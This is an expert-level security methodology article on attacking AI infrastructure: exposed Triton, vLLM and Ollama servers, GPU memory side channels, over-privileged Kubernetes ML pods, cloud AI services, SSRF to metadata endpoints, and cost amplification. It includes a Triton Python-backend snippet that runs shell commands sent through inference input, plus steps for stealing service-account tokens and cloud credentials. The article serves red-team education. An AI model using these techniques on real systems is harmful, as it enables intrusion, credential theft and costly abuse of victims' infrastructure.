AI Infrastructure Exploitation

expert10 min readUpdated 2026-03-11

Methodology for exploiting GPU clusters, model serving frameworks (Triton, vLLM, Ollama), Kubernetes ML platforms, cloud AI services, and cost amplification attacks.

infrastructure gpu triton vllm ollama kubernetes cloud-ai cost-amplification

AI Infrastructure Exploitation

AI infrastructure combines traditional attack surfaces with AI-specific concerns: model serving frameworks with unauthenticated APIs, GPU drivers with kernel-level access, multi-tenant inference platforms with shared memory, and cloud AI services with billing models ripe for cost amplification.

Infrastructure Attack Surfaces

AI infrastructure spans several distinct target categories, each with unique exploitation characteristics.

Model serving frameworks (Triton, vLLM, Ollama) are frequently deployed without authentication, exposing model enumeration, configuration details, and inference endpoints. The highest-severity risk is code execution through custom backends -- Triton's Python backend runs arbitrary code during model load and inference. Unauthenticated management APIs allow loading attacker-controlled models, making any exposed model server a potential foothold into the inference infrastructure.

GPU clusters introduce hardware-level attack surfaces absent from traditional infrastructure. Uninitialized GPU memory can contain data from previous tenants (model weights, training data, API keys). NVLink and NVSwitch fabrics enable peer-to-peer memory access across GPUs if isolation is not enforced. CUDA IPC handles allow cross-process GPU memory access. NVIDIA DCGM management APIs on port 5555 provide cluster-wide GPU control when exposed without authentication.

ML pipelines on Kubernetes commonly over-provision permissions, granting cluster-admin to training job service accounts. Shared storage mounts (/models, /data, /checkpoints) enable lateral movement from a compromised training job to production model replacement or data poisoning. CI/CD systems that automate training and deployment are high-value targets -- compromising the pipeline produces persistent, automated backdoor injection across all future model versions.

GPU Cluster Attacks

Attack Surface Enumeration

From a compromised container, enumerate the GPU infrastructure:

Component	What to Check	How
GPU hardware & driver	Model, driver version, compute mode, MIG status	`nvidia-smi --query-gpu=name,driver_version,memory.total,compute_mode,mig.mode.current --format=csv`
CUDA version	Known vulnerabilities in specific versions	`nvcc --version`
DCGM exposure	DCGM management API on port 5555	TCP connect to `localhost:5555`
NCCL config	Multi-GPU communication settings	Check `NCCL_*` environment variables
NVLink/NVSwitch	Peer-to-peer GPU memory access, isolation gaps	Check for enabled CUDA IPC handles

GPU Memory Side Channels

Memory remnants: Allocate uninitialized GPU memory via torch.empty(1024, 1024, device='cuda') and scan for non-zero values. On shared infrastructure, previous tenants' model weights, training data, and API keys may be recoverable.

Timing attacks: Measure allocation latency over many iterations. Bimodal distribution in allocation times indicates co-tenant interference, revealing workload patterns and memory pressure.

NVLink/NVSwitch Risks

Risk	Description
Peer-to-peer memory access	NVLink-connected GPUs can access each other's memory if peer access is enabled
NVSwitch fabric	Any-to-any GPU memory access across the fabric
CUDA IPC handles	Shared GPU memory between processes via file descriptors; if an attacker obtains the handle, they read/write another process's GPU memory

Model Serving Vulnerabilities

Reconnaissance Methodology

Identify the serving framework
Probe common endpoints to determine which framework is running.
Framework Health Endpoint Default Port
Triton /v2/health/ready 8000 (HTTP), 8001 (gRPC)
vLLM /health 8000
Ollama /api/tags 11434
Check for authentication
Most model serving frameworks deploy without authentication by default. Test unauthenticated access to model listing and inference endpoints.
Enumerate models and configurations
Extract model names, architectures, input/output specs, and backend types. Look for Python backends (code execution) and ensemble pipelines.
Test for exploitable features
Check model control APIs (load/unload), metrics endpoints (information disclosure), and custom backend execution.

Framework	Health Endpoint	Default Port
Triton	`/v2/health/ready`	8000 (HTTP), 8001 (gRPC)
vLLM	`/health`	8000
Ollama	`/api/tags`	11434

Framework-Specific Attacks

Triton is the most feature-rich target:

Endpoint	Risk
`GET /v2/models`	Model enumeration without auth
`GET /v2/models/\{name\}/config`	Architecture details, backend type, file paths
`POST /v2/repository/index`	Full model repository listing
Model control API	Load/unload arbitrary models

Critical risk: Triton's Python backend executes arbitrary code. If you can place a model in the repository, model.py runs during inference:

# model.py in Triton's model repository
class TritonPythonModel:
    def initialize(self, args):
        os.system('id > /tmp/pwned')  # Runs on model load
    def execute(self, requests):
        # Use inference input as command channel
        cmd = pb_utils.get_input_tensor_by_name(
            requests[0], 'INPUT').as_numpy()[0].decode()
        output = subprocess.getoutput(cmd)

vLLM exposes an OpenAI-compatible API, typically without authentication:

Check	Endpoint	Risk
Model listing	`GET /v1/models`	Information disclosure
Health/metrics	`GET /metrics`	GPU count, memory, request patterns, architecture
Inference	`POST /v1/chat/completions`	Compute abuse, system prompt extraction

Test for system prompt override by sending a system message that contradicts the deployment's intended prompt.

Ollama binds to localhost by default but is often exposed on 0.0.0.0 with no authentication:

Action	Endpoint	Impact
List models	`GET /api/tags`	Enumeration
Pull models	`POST /api/pull`	Bandwidth/storage abuse
Create models	`POST /api/create`	Custom Modelfile execution
Delete models	`DELETE /api/delete`	Denial of service
Run inference	`POST /api/generate`	Compute abuse

Kubernetes ML Platform Attacks

Privilege Escalation from ML Pods

ML pods commonly have excessive permissions. After compromising a training job, enumerate Kubernetes access:

Read the service account token
Check /var/run/secrets/kubernetes.io/serviceaccount/token. ML platform service accounts are frequently bound to cluster-admin.
Enumerate accessible resources
Test access to cluster-wide secrets, pods, nodes, namespaces, and deployments using the service account token against the Kubernetes API.
Access shared storage
Check common ML mount points for lateral access.

Shared Storage Attack Paths

Mount Point	Typical Content	Exploitation
`/models`	Shared model registry	Replace production models with trojaned versions
`/data`	Training datasets	Poison training data
`/checkpoints`	Training checkpoints	Inject backdoored checkpoints
`/artifacts`	MLflow/W&B artifacts	Redirect model deployments
`/home/jovyan`	JupyterHub home directories	Access other users' notebooks and credentials

Cloud AI Service Exploitation

Cloud-Specific Attack Surfaces

Cloud Service	Entry Points	Escalation Paths
AWS SageMaker	Notebook instances (Jupyter + IAM role), training jobs (S3/ECR access), endpoints (SSRF)	Enumerate endpoints, models, training jobs; pivot via IAM role
GCP Vertex AI	Notebook instances, custom training containers, model endpoints	Service account impersonation, GCS bucket access
Azure ML	Compute instances, managed endpoints, datastores	Managed identity abuse, blob storage access

From a compromised SageMaker notebook, enumerate all endpoints (deployed models), models (with S3 artifact paths), and training jobs (with IAM roles and hyperparameters) via the boto3 SageMaker client.

Cost Amplification Attacks

Attack Vector	Mechanism	Estimated Hourly Cost
GPU inference abuse	Max-length requests at max throughput to GPU endpoints	~$360 (10 req/s x $0.01)
Training job spawn	Launch multi-GPU training jobs via compromised credentials	~$500 per job (10 parallel)
Model download abuse	Repeated downloads of large models to trigger egress charges	~$540 (100GB x 60 downloads x $0.09/GB)
Embedding API abuse	Max-size batches to embedding endpoints continuously	Varies by provider

Inference Service SSRF

Model serving endpoints that accept URLs as input (image classification, web scraping, document processing) are SSRF vectors.

Priority SSRF Targets

Target	URL	What You Get
AWS IMDS	`http://169.254.169.254/latest/meta-data/iam/security-credentials/`	IAM credentials
GCP metadata	`http://metadata.google.internal/computeMetadata/v1/`	Service account tokens
Azure IMDS	`http://169.254.169.254/metadata/identity/oauth2/token`	Managed identity tokens
Kubernetes API	`http://kubernetes.default.svc/api/v1/namespaces`	Cluster enumeration
Internal Triton	`http://triton-server.internal:8000/v2/models`	Model enumeration
Internal Ollama	`http://localhost:11434/api/tags`	Local model listing

Knowledge Check

You discover an NVIDIA Triton server exposed without authentication. Which finding represents the highest severity risk?

AI Supply Chain Exploitation -- Supply chain attacks that compromise infrastructure from within
AI Application Security -- Application-layer vulnerabilities on infrastructure endpoints
MCP Tool Exploitation -- MCP servers running on exploitable infrastructure
Advanced Reconnaissance -- Fingerprinting model serving frameworks as recon targets

References

OWASP Machine Learning Security Top 10 — ML infrastructure risks
NVIDIA Triton Inference Server — Model serving infrastructure
Kubernetes Security Best Practices (CISA, 2022) — K8s security for ML clusters

AI Infrastructure Exploitation

Identify the serving framework

Check for authentication

Enumerate models and configurations

Test for exploitable features

Read the service account token

Enumerate accessible resources

Access shared storage

Related articles

AI Infrastructure Exploitation

Identify the serving framework

Check for authentication

Enumerate models and configurations

Test for exploitable features

Read the service account token

Enumerate accessible resources

Access shared storage

Related articles